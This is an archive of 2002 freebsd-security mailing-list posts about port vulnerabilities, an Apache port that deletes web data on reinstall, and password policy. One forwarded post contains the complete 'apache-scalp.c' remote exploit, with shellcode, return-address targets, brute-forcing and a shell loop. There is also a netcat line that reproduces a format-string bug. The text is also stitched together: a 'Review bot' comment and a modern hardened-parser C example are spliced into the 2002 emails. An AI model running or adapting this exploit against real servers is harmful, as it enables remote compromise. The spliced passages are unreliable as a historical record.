Port name:      icmpmonitor
Affected:       versions < icmpmonitor-1.11_1
Status:         Fixed

Format string vulnerability (syslog).

+------------------------------------------------------------------------+
Port name:      imap-uw
Affected:       All versions
Status:         Not fixed

Locally exploitable stack buffer overflow when compiled with WITH_RFC1730 (which is not the default).

+------------------------------------------------------------------------+
Port name:      mnews
Affected:       All versions
Status:         Not fixed

Remotely exploitable buffer overflows.

+------------------------------------------------------------------------+
Port name:      nn
Affected:       versions < nn-6.6.2_1
Status:         Fixed

Remotely exploitable format string vulnerability.
Reproduce using netcat:

    perl -e 'printf("100 %s\n", "%x" x 800);' | nc -l -p 119
    env NNTPSERVER="localhost" nn

+------------------------------------------------------------------------+
Port name:      sharity-light
Affected:       versions < sharity-light-1.2_1
Status:         Fixed

Stack buffer overflow when copying the username and password from the environment (variables USER, LOGNAME, and PASSWD). Reported by Niels Heinen .

+------------------------------------------------------------------------+
Port name:      slurp
Affected:       versions < slurp-1.10_1
Status:         Fixed

Remotely exploitable format string vulnerability.

+------------------------------------------------------------------------+
Port name:      xchat
Affected:       versions < xchat-1.8.9
Status:         Fixed

An IRC server may execute arbitrary commands with the privileges of the user running xchat.

+------------------------------------------------------------------------+

III. Upgrading Ports/Packages

To upgrade a fixed port/package, perform one of the following:

1) Upgrade your Ports Collection and rebuild and reinstall the port. Several tools are available in the Ports Collection to make this easier. See:

   /usr/ports/devel/portcheckout
   /usr/ports/misc/porteasy
   /usr/ports/sysutils/portupgrade

2) Deinstall the old package and install a new package obtained from

   [i386] ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/All/

Packages are not automatically generated for other architectures at this time.

+------------------------------------------------------------------------+

FreeBSD Security Notices are communications from the Security Officer intended to inform the user community about potential security issues, such as bugs in the third-party applications found in the Ports Collection, which will not be addressed in a FreeBSD Security Advisory. Feedback on Security Notices is welcome at .
From owner-freebsd-security Wed Jun 19 14:57:14 2002
Date: Wed, 19 Jun 2002 17:56:46 -0400 (EDT)
From: Igor Roshchin
Message-Id: <200206192156.g5JLukI21451@giganda.komkon.org>
To: brett@lariat.org
Subject: Re: Apache 1.3.26 port
Cc: freebsd-security@freebsd.org
In-Reply-To: <4.3.2.7.2.20020619153117.0230db10@localhost>

Brett,

It's nice that you have so much energy to write so many e-mails to the mailing list. However, if you have so many time resources on your hands, why wouldn't you take a quick look in the files/patch-?? files? If you did that, you'd see that one of the patches (patch-ab) introduces that (see the excerpt from the patch file below). This way you would've saved your time, other people's time, and bandwidth, and produced a more useful result.

The author of the patch (sorry, don't have time to look into the cvs tree now) didn't consider the situation that the actual data directory would still be in the same directory where *.default is pointing. One (who has some time on his hands) needs to do a few more checks before removing that directory tree.

Best,
Igor

Excerpt from ports/apache13/files/patch-ab:

--- Makefile.tmpl.orig	Wed Nov 28 18:02:12 2001
+++ Makefile.tmpl	Fri Jan 25 07:48:19 2002
@@ -270,10 +270,12 @@
 	$(MKDIR) $(root)$(mandir)/man1
 	$(MKDIR) $(root)$(mandir)/man8
 	$(MKDIR) $(root)$(sysconfdir)
-	$(MKDIR) $(root)$(htdocsdir)
+	$(RM) -rf $(root)$(htdocsdir).default
+	$(MKDIR) $(root)$(htdocsdir).default
 	$(MKDIR) $(root)$(manualdir)
 	$(MKDIR) $(root)$(iconsdir)
-	$(MKDIR) $(root)$(cgidir)
+	$(RM) -rf $(root)$(cgidir).default
+	$(MKDIR) $(root)$(cgidir).default
 	$(MKDIR) $(root)$(includedir)
 	$(MKDIR) $(root)$(includedir)/xml
 	$(MKDIR) $(root)$(runtimedir)
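Review bot: the two `$(RM) -rf $(root)$(htdocsdir).default` and `$(RM) -rf $(root)$(cgidir).default` lines added in this hunk run unconditionally, and since the port installs `data` and `cgi-bin` as symlinks into those `.default` directories (as described earlier in this thread), the administrator's live document root and CGI tree are deleted along with the port's sample files. Before each `$(RM)` the target should test whether the directory already exists and holds anything beyond the port's own files, and refuse (or move it aside) rather than remove it; alternatively, stop pointing the live `data`/`cgi-bin` symlinks at `.default` at all. At minimum the port's install message must state that `*.default` is replaced on reinstall, since nothing currently says so.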
@@ -459,33 +461,39 @@

From owner-freebsd-security Wed Jun 19 15:16: 9 2002
Message-Id: <4.3.2.7.2.20020619160330.023789f0@localhost>
Date: Wed, 19 Jun 2002 16:07:58 -0600
To: Igor Roshchin
From: Brett Glass
Subject: Re: Apache 1.3.26 port
Cc: freebsd-security@freebsd.org
In-Reply-To: <200206192156.g5JLukI21451@giganda.komkon.org>
References: <4.3.2.7.2.20020619153117.0230db10@localhost>

At 03:56 PM 6/19/2002, Igor Roshchin wrote:
>Brett,
>
>It's nice that you have so much energy to write so many e-mails
>to the mailing list.
>However, if you have so many time resources on your hands, why wouldn't you
>take a quick look in the files/patch-?? files?
>If you did that, you'd see that one of the patches (patch-ab)
>introduces that.

Why would it need to be introduced if it was already in Apache?

>(see the excerpt from the patch file below).
>This way you would've saved your time, other people's time,
>and bandwidth, and produced a more useful result.

It wouldn't have changed the usefulness of what I said. Data is deleted, period. True, it's done via the symlink "data.default", but the result is the same as if /usr/local/www/data were nuked directly.

>The author of the patch (sorry, don't have time to look into the cvs tree
>now)

If you didn't have time to look into the CVS tree, why are you making a big deal about the fact that I didn't do so... especially since what was wrong was already clear?
--Brett

From owner-freebsd-security Wed Jun 19 15:27:48 2002
Date: Wed, 19 Jun 2002 15:26:49 -0700
From: Jason DiCioccio
Reply-To: Jason DiCioccio
To: freebsd-security@freebsd.org
Subject: Apache exploit?
Message-ID: <2147483647.1024500409@[192.168.4.154]>

I don't know if this has already made bugtraq, or if it's waiting in their queue or what.. But I just happened to get ahold of this recently. It appears that FreeBSD and OpenBSD are exploitable. I haven't tested it yet, as I have already upgraded. Courtesy of Gobbles apparently.. The wrapping is a bit messed up, but I'm lazy :)

Cheers,
-JD-

--
Jason DiCioccio - jd@bluenugget.net - Useless .sig
Open Domain Service - geniusj@ods.org - http://www.ods.org/
Ruby - jd@ruby-lang.org - http://www.ruby-lang.org/
PGP Fingerprint - C442 04E2 26B0 3809 8357 96AB D350 9596 0436 7C08

/*
 * apache-scalp.c
 * OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!!
 *
 * ROBUST, RELIABLE, USER-FRIENDLY MOTHERFUCKING 0DAY WAREZ!
 *
 * BLING! BLING! --- BRUTE FORCE CAPABILITIES --- BLING! BLING!
 *
 * ". . . and Doug Sniff said it was a hole in Epic."
 *
 * ---
 * Disarm you with a smile
 * And leave you like they left me here
 * To wither in denial
 * The bitterness of one who's left alone
 * ---
 *
 * Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to
 * the OpenBSD developers (Theo, DugSong, jnathan, *@#!w00w00, ...) and
 * their crappy memcpy implementation that makes this 32-bit impossibility
 * very easy to accomplish. This vulnerability was recently rediscovered by a slew
 * of researchers.
 *
 * The "experts" have already concurred that this bug...
* - Can not be exploited on 32-bit *nix variants * - Is only exploitable on win32 platforms * - Is only exploitable on certain 64-bit systems * * However, contrary to what ISS would have you believe, we have * successfully exploited this hole on the following operating systems: * * Sun Solaris 6-8 (sparc/x86) * FreeBSD 4.3-4.5 (x86) * OpenBSD 2.6-3.1 (x86) * Linux (GNU) 2.4 (x86) * * Don't get discouraged too quickly in your own research. It took us close * to two months to be able to exploit each of the above operating systems. * There is a peculiarity to be found for each operating system that makes the * exploitation possible. * * Don't email us asking for technical help or begging for warez. We are * busy working on many other wonderful things, including other remotely * exploitable holes in Apache. Perhaps The Great Pr0ix would like to inform * the community that those holes don't exist? We wonder who's paying her. * * This code is an early version from when we first began researching the * vulnerability. It should spawn a shell on any unpatched OpenBSD system * running the Apache webserver. * * We appreciate The Blue Boar's effort to allow us to post to his mailing * list once again. Because he finally allowed us to post, we now have this * very humble offering. * * This is a very serious vulnerability. After disclosing this exploit, we * hope to have gained immense fame and glory. * * Testbeds: synnergy.net, monkey.org, 9mm.com * * Abusing the right syscalls, any exploit against OpenBSD =3D=3D root. Kernel * bugs are great. * * [#!GOBBLES QUOTES] * * --- you just know 28923034839303 admins out there running * OpenBSD/Apache are going "ugh..not exploitable..ill do it after the * weekend" * --- "Five years without a remote hole in the default install". default * package =3D kernel. if theo knew that talkd was exploitable, he'd cry. * --- so funny how apache.org claims it's impossible to exploit this. 
* --- how many times were we told, "ANTISEC IS NOT FOR YOU" ? * --- I hope Theo doesn't kill himself * --- heh, this is a middle finger to all those open source, anti-"m$" * idiots... slashdot hippies... * --- they rushed to release this exploit so they could update their ISS * scanner to have a module for this vulnerability, but it doesnt even * work... it's just looking for win32 apache versions * --- no one took us seriously when we mentioned this last year. we warned * them that moderation =3D=3D no pie. * --- now try it against synnergy :> * --- ANOTHER BUG BITE THE DUST... VROOOOM VRRRRRRROOOOOOOOOM * * xxxx this thing is a major exploit. do you really wanna publish it? * oooo i'm not afraid of whitehats * xxxx the blackhats will kill you for posting that exploit * oooo blackhats are a myth * oooo so i'm not worried * oooo i've never seen one * oooo i guess it's sort of like having god in your life * oooo i don't believe there's a god * oooo but if i sat down and met him * oooo i wouldn't walk away thinking * oooo "that was one hell of a special effect" * oooo so i suppose there very well could be a blackhat somewhere * oooo but i doubt it... i've seen whitehat-blackhats with their ethics * and deep philosophy... 
* * [GOBBLES POSERS/WANNABES] * * --- #!GOBBLES@EFNET (none of us join here, but we've sniffed it) * --- super@GOBBLES.NET (low-level.net) * * GOBBLES Security * GOBBLES@hushmail.com * http://www.bugtraq.org * */ #include #include #include #include #include #include #include #include #include #include #include #define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming it failed */ #define RET_ADDR_INC 512 #define MEMCPY_s1_OWADDR_DELTA -146 #define PADSIZE_1 4 #define PADSIZE_2 5 #define PADSIZE_3 7 #define REP_POPULATOR 24 #define REP_RET_ADDR 6 #define REP_ZERO 36 #define REP_SHELLCODE 24 #define NOPCOUNT 1024 #define NOP 0x41 #define PADDING_1 'A' #define PADDING_2 'B' #define PADDING_3 'C' #define PUT_STRING(s) memcpy(p, s, strlen(s)); p +=3D strlen(s); #define PUT_BYTES(n, b) memset(p, b, n); p +=3D n; #define SHELLCODE_LOCALPORT_OFF 30 char shellcode[] =3D "\x89\xe2\x83\xec\x10\x6a\x10\x54\x52\x6a\x00\x6a\x00\xb8\x1f" "\x00\x00\x00\xcd\x80\x80\x7a\x01\x02\x75\x0b\x66\x81\x7a\x02" "\x42\x41\x75\x03\xeb\x0f\x90\xff\x44\x24\x04\x81\x7c\x24\x04" "\x00\x01\x00\x00\x75\xda\xc7\x44\x24\x08\x00\x00\x00\x00\xb8" "\x5a\x00\x00\x00\xcd\x80\xff\x44\x24\x08\x83\x7c\x24\x08\x03" "\x75\xee\x68\x0b\x6f\x6b\x0b\x81\x34\x24\x01\x00\x00\x01\x89" "\xe2\x6a\x04\x52\x6a\x01\x6a\x00\xb8\x04\x00\x00\x00\xcd\x80" "\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe2\x31\xc0\x50" "\x52\x89\xe1\x50\x51\x52\x50\xb8\x3b\x00\x00\x00\xcd\x80\xcc"; struct { char *type; u_long retaddr; } targets[] =3D { // hehe, yes theo, that say OpenBSD here! 
{ "OpenBSD 3.0 x86 / Apache 1.3.20", 0xcf92f }, { "OpenBSD 3.0 x86 / Apache 1.3.22", 0x8f0aa }, { "OpenBSD 3.0 x86 / Apache 1.3.24", 0x90600 }, { "OpenBSD 3.1 x86 / Apache 1.3.20", 0x8f2a6 }, { "OpenBSD 3.1 x86 / Apache 1.3.23", 0x90600 }, { "OpenBSD 3.1 x86 / Apache 1.3.24", 0x9011a }, { "OpenBSD 3.1 x86 / Apache 1.3.24 #2", 0x932ae }, }; int main(int argc, char *argv[]) { char *hostp, *portp; unsigned char buf[512], *expbuf, *p; int i, j, lport; int sock; int bruteforce, owned, progress; u_long retaddr; struct sockaddr_in sin, from; if(argc !=3D 3) { printf("Usage: %s \n", argv[0]); printf(" Using targets:\t./apache-scalp 3 127.0.0.1:8080\n"); printf(" Using bruteforce:\t./apache-scalp 0x8f000 127.0.0.1:8080\n"); printf("\n--- --- - Potential targets list - --- ----\n"); printf("Target ID / Target specification\n"); for(i =3D 0; i < sizeof(targets)/8; i++) printf("\t%d / %s\n", i, targets[i].type); return -1; } hostp =3D strtok(argv[2], ":"); if((portp =3D strtok(NULL, ":")) =3D=3D NULL) portp =3D "80"; retaddr =3D strtoul(argv[1], NULL, 16); if(retaddr < sizeof(targets)/8) { retaddr =3D targets[retaddr].retaddr; bruteforce =3D 0; } else bruteforce =3D 1; srand(getpid()); signal(SIGPIPE, SIG_IGN); for(owned =3D 0, progress =3D 0;;retaddr +=3D RET_ADDR_INC) { /* skip invalid return adresses */ i =3D retaddr & 0xff; if(i =3D=3D 0x0a || i =3D=3D 0x0d) retaddr++; else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4)) continue; sock =3D socket(AF_INET, SOCK_STREAM, 0); sin.sin_family =3D AF_INET; sin.sin_addr.s_addr =3D inet_addr(hostp); sin.sin_port =3D htons(atoi(portp)); if(!progress) printf("\n[*] Connecting.. 
"); fflush(stdout); if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) !=3D 0) { perror("connect()"); exit(1); } if(!progress) printf("connected!\n"); /* Setup the local port in our shellcode */ i =3D sizeof(from); if(getsockname(sock, (struct sockaddr *) & from, &i) !=3D 0) { perror("getsockname()"); exit(1); } lport =3D ntohs(from.sin_port); shellcode[SHELLCODE_LOCALPORT_OFF + 1] =3D lport & 0xff; shellcode[SHELLCODE_LOCALPORT_OFF + 0] =3D (lport >> 8) & 0xff; p =3D expbuf =3D malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE) + ((PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) * REP_POPULATOR)); PUT_STRING("GET / HTTP/1.1\r\nHost: apache-scalp.c\r\n"); for (i =3D 0; i < REP_SHELLCODE; i++) { PUT_STRING("X-"); PUT_BYTES(PADSIZE_3, PADDING_3); PUT_STRING(": "); PUT_BYTES(NOPCOUNT, NOP); memcpy(p, shellcode, sizeof(shellcode) - 1); p +=3D sizeof(shellcode) - 1; PUT_STRING("\r\n"); } for (i =3D 0; i < REP_POPULATOR; i++) { PUT_STRING("X-"); PUT_BYTES(PADSIZE_1, PADDING_1); PUT_STRING(": "); for (j =3D 0; j < REP_RET_ADDR; j++) { *p++ =3D retaddr & 0xff; *p++ =3D (retaddr >> 8) & 0xff; *p++ =3D (retaddr >> 16) & 0xff; *p++ =3D (retaddr >> 24) & 0xff; } PUT_BYTES(REP_ZERO, 0); PUT_STRING("\r\n"); } PUT_STRING("Transfer-Encoding: chunked\r\n"); snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2); PUT_STRING(buf); PUT_BYTES(PADSIZE_2, PADDING_2); snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", MEMCPY_s1_OWADDR_DELTA); PUT_STRING(buf); write(sock, expbuf, p - expbuf); progress++; if((progress%70) =3D=3D 0) progress =3D 1; if(progress =3D=3D 1) { memset(buf, 0, sizeof(buf)); sprintf(buf, "\r[*] Currently using retaddr 0x%lx, length %u, localport %u", retaddr, (unsigned int)(p - expbuf), lport); memset(buf + strlen(buf), ' ', 74 - strlen(buf)); puts(buf); if(bruteforce) putchar(';'); } else putchar((rand()%2)? 
'P': 'p'); fflush(stdout); while (1) { fd_set fds; int n; struct timeval tv; tv.tv_sec =3D EXPLOIT_TIMEOUT; tv.tv_usec =3D 0; FD_ZERO(&fds); FD_SET(0, &fds); FD_SET(sock, &fds); memset(buf, 0, sizeof(buf)); if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) { if(FD_ISSET(sock, &fds)) { if((n =3D read(sock, buf, sizeof(buf) - 1)) <=3D 0) break; if(!owned && n >=3D 4 && memcmp(buf, "\nok\n", 4) =3D=3D 0) { printf("\nGOBBLE GOBBLE!@#%%)*#\n"); printf("retaddr 0x%lx did the trick!\n", retaddr); sprintf(expbuf, "uname -a;id;echo hehe, now use 0day OpenBSD local kernel exploit to gain instant r00t\n"); write(sock, expbuf, strlen(expbuf)); owned++; } write(1, buf, n); } if(FD_ISSET(0, &fds)) { if((n =3D read(0, buf, sizeof(buf) - 1)) < 0) exit(1); write(sock, buf, n); } } if(!owned) break; } free(expbuf); close(sock); if(owned) return 0; if(!bruteforce) { fprintf(stderr, "Ooops.. hehehe!\n"); return -1; } } return 0; } To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 19 15:32:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from duckparty.net (mail.duckparty.net [213.145.172.178]) by hub.freebsd.org (Postfix) with ESMTP id 5523637B4A5 for ; Wed, 19 Jun 2002 15:31:58 -0700 (PDT) Received: from Thominem (moya.duckparty.net [213.145.172.179]) by duckparty.net (8.11.6/8.11.2) with SMTP id g5JMVvO02513 for ; Thu, 20 Jun 2002 00:31:57 +0200 Message-ID: <017801c217e1$2fdd06d0$b3ac91d5@Thominem> 
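The request above ends with a chunk-size of -146 rendered through "%x"; the following is an added example, not code from the posted exploit or from Apache, showing a naive hex chunk-size parse that turns that field into a negative signed length beside a bounds-checked decoder that rejects it. Function names, the MAX_CHUNK_SIZE limit and the sample bodies are my own assumptions.

```c
/* Added example (not from the posted exploit or from Apache): parsing the
 * chunk-size field of an HTTP/1.1 chunked body. naive_chunk_size() shows an
 * unchecked parse into a signed int turning "ffffff6e" into -146; the rest
 * is the bounds-checked form. Names, MAX_CHUNK_SIZE and bodies are assumed. */
#include <ctype.h>
#include <stdint.h>
#include <string.h>

#define MAX_CHUNK_SIZE (1UL << 20)  /* per-chunk policy limit chosen here */

static unsigned hexval(int c)
{
    return isdigit(c) ? (unsigned)(c - '0') : (unsigned)(tolower(c) - 'a' + 10);
}

/* Naive parse: hex digits accumulated and returned as a signed 32-bit int
 * with no range check, so 0xffffff6e reads as -146 and "fits" in any
 * signed buffer-size comparison while memcpy would receive (size_t)-146. */
int naive_chunk_size(const char *line)
{
    uint32_t n = 0;
    for (; isxdigit((unsigned char)*line); line++)
        n = n * 16 + hexval((unsigned char)*line);   /* wraps silently */
    return (int)n;
}

/* Hardened parse of the hex field at p (len bytes readable). Rejects an
 * empty field, size_t overflow and anything above MAX_CHUNK_SIZE; on
 * success stores the size and the digits consumed and returns 1. */
int parse_chunk_size(const char *p, size_t len, size_t *out, size_t *consumed)
{
    size_t n = 0, i = 0;
    while (i < len && isxdigit((unsigned char)p[i])) {
        unsigned d = hexval((unsigned char)p[i]);
        if (n > (SIZE_MAX - d) / 16)   /* n * 16 + d would overflow */
            return 0;
        n = n * 16 + d;
        if (n > MAX_CHUNK_SIZE)        /* over policy: stop before it grows */
            return 0;
        i++;
    }
    if (i == 0)                        /* no digits at all: malformed */
        return 0;
    *out = n;
    *consumed = i;
    return 1;
}

/* Decode a complete chunked body into out (capacity outcap). Returns the
 * decoded length, or -1 on a rejected size, truncated chunk, bad CRLF
 * framing or insufficient room. Extensions are skipped, trailers ignored. */
long decode_chunked(const char *body, size_t bodylen, char *out, size_t outcap)
{
    const char *p = body, *end = body + bodylen;
    size_t total = 0, sz, used;
    for (;;) {
        if (!parse_chunk_size(p, (size_t)(end - p), &sz, &used))
            return -1;
        p += used;
        while (p < end && *p != '\r')  /* skip any ";name=value" extension */
            p++;
        if (end - p < 2 || p[0] != '\r' || p[1] != '\n')
            return -1;
        p += 2;
        if (sz == 0)                   /* last-chunk */
            return (long)total;
        if ((size_t)(end - p) < sz + 2 || sz > outcap - total)
            return -1;                 /* truncated data or no room left */
        memcpy(out + total, p, sz);
        total += sz;
        p += sz;
        if (p[0] != '\r' || p[1] != '\n')
            return -1;
        p += 2;
    }
}

/* Constructed bodies; each returns 1 when the decoder behaves as intended.
 * The second carries "ffffff6e", the "%x" rendering of -146 that the
 * posted exploit emits as its final chunk-size. */
int check_benign_body(void)
{
    static const char body[] = "4\r\nWiki\r\n5\r\npedia\r\n0\r\n\r\n";
    char out[64];
    long n = decode_chunked(body, sizeof body - 1, out, sizeof out);
    return n == 9 && memcmp(out, "Wikipedia", 9) == 0;
}

int check_negative_size_body(void)
{
    static const char body[] = "5\r\nBBBBB\r\nffffff6e\r\n";
    char out[64];
    return decode_chunked(body, sizeof body - 1, out, sizeof out) == -1;
}
```

The naive result is below any plausible buffer size, which is why a signed "does it fit" test lets it through; the hardened parser stops at the sixth digit because the value has already exceeded the limit.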
From owner-freebsd-security Wed Jun 19 15:49:20 2002
Delivered-To: freebsd-security@freebsd.org
Received: from ren.sasknow.com (ren.sasknow.com [207.195.92.131]) by hub.freebsd.org (Postfix) with ESMTP id DBA1A37B403 for ; Wed, 19 Jun 2002 15:49:11 -0700 (PDT)
Received: from localhost (ryan@localhost) by ren.sasknow.com (8.11.6/8.11.6) with ESMTP id g5JMn5837415; Wed, 19 Jun 2002 16:49:05 -0600 (CST) (envelope-from ryan@sasknow.com)
Date: Wed, 19 Jun 2002 16:49:04 -0600 (CST)
From: Ryan Thompson
To: Bill Moran
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Password security
In-Reply-To: <3D108570.70409@potentialtech.com>
Message-ID: <20020619154831.Q32240-100000@ren.sasknow.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG

Bill Moran wrote to Ryan Thompson:

> There were a lot of excellent responses,

I'd like to echo the same to the list; thanks to all of you for the
plethora of responses and good discussion. This thread is actually not
getting as far off track as I thought it might by now :-)

> There are some tricks to improve the "average human's" memory.
> Poetry is one of them. Most people can memorize a few lines of
> poetry (or a song) rather easily. Increase the length of their
> passwords to 10+ and then tell them how to generate them: Take a line
> of poetry or a line from a song and make an acronym from it.

Yes, very good idea. I have tried similar strategies in the past, and
had problems with compliance. (People inevitably tried it, got tired of
the "new thing", and changed their password back to what it was before).

I guess the problem was that the users still had access to set almost
arbitrary passwords for themselves... so going back to old habits was
too easy. I probably should have persisted with this and made it work.

Issuing passwords, at least, guarantees some level of password
uniqueness and entropy.. provided users don't do foolish things like
tape it to their monitor because it's too long to remember. :-)

Thus, I can restrict access to the passwd binary, and print the wallet
cards with new keys every month, and assist with the memorization of
the new short passwords. (Which, if I use the "poetry" idea in some
way, will be much easier).

> poem is actually much longer (and I remember the whole flippin
> thing), but just those two lines give me "trftpidtshbiclttantb" as a
> password, 20 characters, and while I don't know for sure, it would
> seem to me that there's more entropy in that than in any "word"

Yes, certainly. Calculating the entropy of that beast would be a bit
difficult... One could just say 26^20, but if I know (or guess) it's
English, and every letter doesn't occur with nearly the same
probability, it's less than that. If I happen to know your algorithm,
and have a dictionary of poetry and/or lyrics handy, it's a *lot* less
than that. If you can mix upper/lower and add punctuation (i.e., "Lo,
Fred's chickens laid 24 eggs!" => "L,F'scl2e!", makes for a stronger
password). More stats than I'd like to do at the moment. :-)

The truth is passwords based on "human" algorithms are usually
surprisingly hard to break. Things like q4w3e2r1t0y fool password
crackers regularly, and usually require brute-forcing. So, short answer
is, yes, your password likely wouldn't be vulnerable to brute-force or
standard dictionary attacks. More effort than required to attack other
avenues, which is really the important thing.

> password. Most people already have dozens of songs memorized, so it
> works. This is more of a "stupid human trick" than brave new
> technology, but it may be helpful to you. :-)
>
> > The best I've come up with so far is to issue random passwords,
> > from an array of 68 possible characters (alpha num and some
> > easily-typed symbols). I issue two passwords for each user. One is
> > short enough to be remembered with a small effort (6 characters,
> > entropy > 2^36, assuming my randomizer is up to par). The second
> > [...]
>
> Actually, that's an excellent procedure. Looks like you've already
> done most of your homework. I kind of like it myself.

> I'm assuming that you've already looked
> into these other issues, but just in case:

> Monitor everything.

Yep. Log to line printer.. Account audits.. Throughput monitoring
(logins, attempts, bandwidth, etc).. Remote monitoring.. The list goes
on.

> Disable accounts that experience x successive unsuccessful logins

Exponential backoff works well enough. I suppose we could trigger
stronger (email) warnings to sysadmins and users after a number of
unsuccessful attempts.

> Obviously, you have some *serious* security concerns.

Doesn't everybody? :-) More than anything, password security is weak,
yet fairly trivial to strengthen. So I wouldn't be doing my job if I
didn't do something about it *before* an attacker takes the initiative
:-)

> > [...]
>
> I wouldn't be worried about folks getting mugged, so much as someone
> being lazy with the security of their system password hash. In this
> case, an account disabling policy will help, because the account
> will be disabled before the cracker can brute force it. Many folks
> will expose their password to others out of laziness and never
> really notice it.

Agreed.

> [...]
> to your network, I would implement a mandatory user education
> program. Use it to:
>
> 1. Explain what's going on and how it works.
>
> 2. Instruct on best practices.
>
> 3. Scare the crap out of them.

Good points. Of course we already have a security policy (10 clearly
written pages, supplemented with links to other sources for those who
want a more detailed understanding). I personally present the security
policy to new employees and informally discuss the important points
one-on-one. A security quiz follows, reinforced with soda and snacks.
Policy seems to sit better when accompanied by food for some reason.
:-)

> > I know that people *want* to re-use their favorite dictionary
> > password(s)... so there will be *some* resistance to a system like
> > the above...
>
> You might be able to use the poetry method above to ease things.

Good idea. I might just do that.

> > I'm not really interested in a "passwords are bad" debate, unless
> > there are readily available technologies of which I'm not aware
> > that can be deployed across many dumb insecure computers across an
> > insecure network.
>
> Passwords are fine, users are bad ;)

:-)

- Ryan

--
  Ryan Thompson
  SaskNow Technologies - http://www.sasknow.com
  901 1st Avenue North - Saskatoon, SK - S7K 1Y4

        Tel: 306-664-3600   Fax: 306-664-3630   Saskatoon
  Toll-Free: 877-727-5669     (877-SASKNOW)     North America

From owner-freebsd-security Wed Jun 19 15:55: 8 2002
Delivered-To: freebsd-security@freebsd.org
Received: from infinity.aesredfish.net (ns1.aesredfish.net [65.168.0.12]) by hub.freebsd.org (Postfix) with ESMTP id 443B537B410 for ; Wed, 19 Jun 2002 15:55:05 -0700 (PDT)
Received: from potentialtech.com (mhope-dhcp-65-168-1-181.dashfast.com [65.168.1.181]) by infinity.aesredfish.net (8.11.6/8.11.0) with ESMTP id g5JMsjr24592; Wed, 19 Jun 2002 18:54:48 -0400
Message-ID: <3D110D17.50809@potentialtech.com>
Date: Wed, 19 Jun 2002 19:00:39 -0400
From: Bill Moran
User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc1) Gecko/20020502
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: jdarnold@buddydog.org
Cc:
    freebsd-security@FreeBSD.ORG
Subject: Re: Apache 1.3.26 port
References: <200206191723590704.0033D6FF@mail.speakeasy.net>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG

Jonathan Arnold wrote:
>>I would consider this semi-correct, at least from my experience. The data
>>directories ARE separated out. Notice that there is a data.default and a
>
> I, in fact, just went through this and would beg to differ. It is not
> very kind to delete a complete directory tree without any warning, either
> when you install (something like "data.default *WILL BE REPLACED ON
> UPGRADE*") or it should check on upgrade and not remove it if it is there.
> I lost my entire web site with nary a peep, and luckily had the most important
> stuff on another computer.

This is outrageous. Have you ever heard of backups? I can't believe you're
blaming loss of data on this. As a system administrator you should be backing
up your data on a regular schedule. And you should ALWAYS back up your data
before ANY upgrade. That's just proper procedure.

--
Bill Moran
Potential Technologies
http://www.potentialtech.com

From owner-freebsd-security Wed Jun 19 16: 4: 7 2002
Delivered-To: freebsd-security@freebsd.org
Received: from pike.epylon.com (mail03.epylon.com [63.93.9.99]) by hub.freebsd.org (Postfix) with ESMTP id E570C37B417 for ; Wed, 19 Jun 2002 16:03:58 -0700 (PDT)
Received: from [192.168.4.154] (sf-gw.epylon.com [63.93.9.98]) by pike.epylon.com (Postfix) with ESMTP id 99B7F59218; Wed, 19 Jun 2002 16:03:58 -0700 (PDT)
User-Agent: Microsoft-Entourage/10.1.0.2006
Date: Wed, 19 Jun 2002 16:03:56 -0700
Subject: Re: Apache 1.3.26 port
From: Jason DiCioccio
To: Bill Moran ,
Cc:
Message-ID:
In-Reply-To: <3D110D17.50809@potentialtech.com>
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG

On 6/19/02 4:00 PM, "Bill Moran" wrote:

> Jonathan Arnold wrote:
>>> I would consider this semi-correct, at least from my experience. The data
>>> directories ARE separated out. Notice that there is a data.default and a
>>
>> I, in fact, just went through this and would beg to differ. It is not
>> very kind to delete a complete directory tree without any warning, either
>> when you install (something like "data.default *WILL BE REPLACED ON
>> UPGRADE*") or it should check on upgrade and not remove it if it is there.
>> I lost my entire web site with nary a peep, and luckily had the most
>> important
>> stuff on another computer.
>
> This is outrageous. Have you ever heard of backups? I can't believe you're
> blaming loss of data on this. As a system administrator you should be backing
> up your data on a regular schedule. And you should ALWAYS back up your data
> before ANY upgrade. That's just proper procedure.

I think there are 2 issues here. One is that he did not do a backup, that is
for sure. However, there is an issue with the port as far as I am concerned as
well. The port shouldn't be rm -rf'ing anything. It should be going by the
plist if anything at all. This way programs like pkg_deinstall and pkg_delete
can do their jobs correctly. For example, pkg_deinstall will not remove a file
if the checksum does not match the checksum that it had upon installation.
This would have saved everyone a lot of trouble and is really just the correct
way to make a port or a package the last time I checked. Granted pkg_delete,
iirc, would have deleted some of the files, like index.html, because I don't
believe it checks checksums before removing files. However the consequences
would have been much less severe.

Doesn't this seem reasonable?

Cheers,
-JD-

From owner-freebsd-security Wed Jun 19 17:56:51 2002
Delivered-To: freebsd-security@freebsd.org
Received: from ra.upan.org (ra.upan.org [204.107.76.19]) by hub.freebsd.org (Postfix) with ESMTP id DD20037B40F for ; Wed, 19 Jun 2002 17:56:47 -0700 (PDT)
